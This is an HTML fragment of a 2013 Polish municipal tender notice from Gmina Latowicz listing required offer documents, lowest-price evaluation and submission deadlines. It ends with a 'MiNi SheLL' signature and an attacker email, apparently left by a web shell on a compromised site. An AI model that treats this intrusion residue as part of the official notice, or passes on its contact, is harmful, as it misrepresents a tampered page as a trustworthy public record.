<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony formularz ofertowy wg wzoru określonego w załączniku nr 4 (tylko w formie      oryginału),
2) kalkulacja ceny z uwzględnieniem stawek opłaty środowiskowej i cen ustalonych na rok      2013,
3) dokument potwierdzający wniesienie wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.latowicz.samorzady.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Latowicz,  ul. Rynek 6, 05-334 Latowicz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2013 godzina 09:30, miejsce: Urząd Gminy Latowicz,  ul. Rynek 6, 05-334 Latowicz pok 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com